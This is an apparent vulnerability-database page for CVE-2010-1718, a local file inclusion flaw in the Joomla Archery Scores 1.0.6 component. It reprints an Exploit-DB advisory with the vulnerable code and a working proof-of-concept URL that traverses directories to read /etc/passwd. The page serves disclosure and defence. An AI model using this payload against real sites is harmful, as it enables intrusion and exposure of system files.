CVE-2010-1718
Description
Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
================================================================================================
Title : Joomla Component Archery Scores (com_archeryscores) v1.0.6 LFI Vulnerability
Vendor : http://lispeltuut.org/
Download : http://lispeltuut.org/archery-scores/download
Date : Sunday, 18 April 2010 - GMT +07:00 Jakarta, Indonesia
Author : wishnusakti + inc0mp13te (HH)
Contact : evileyes60117[at]yahoo.com
================================================================================================
[+] Vulnerable
./components/com_archeryscores/archeryscores.php
Line 22: if($controller = JRequest::getVar('controller')) {
Line 23: require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
Line 24: }
[+] Exploit
http://[site]/[path]/index.php?option=com_archeryscores&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
================================================================================================
Greetz to:
Penghuni #nob0dy priv8 Server
(ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, madonk, & Botยฒ Scan :D)
en Semua Komunitas Hacking Tanah Air
Peace Yo :)
================================================================================================
# ./wishnusakti
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| lispeltuut | com_archeryscores | 1.0.6 | |
| joomla | joomla\! | | |
References
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.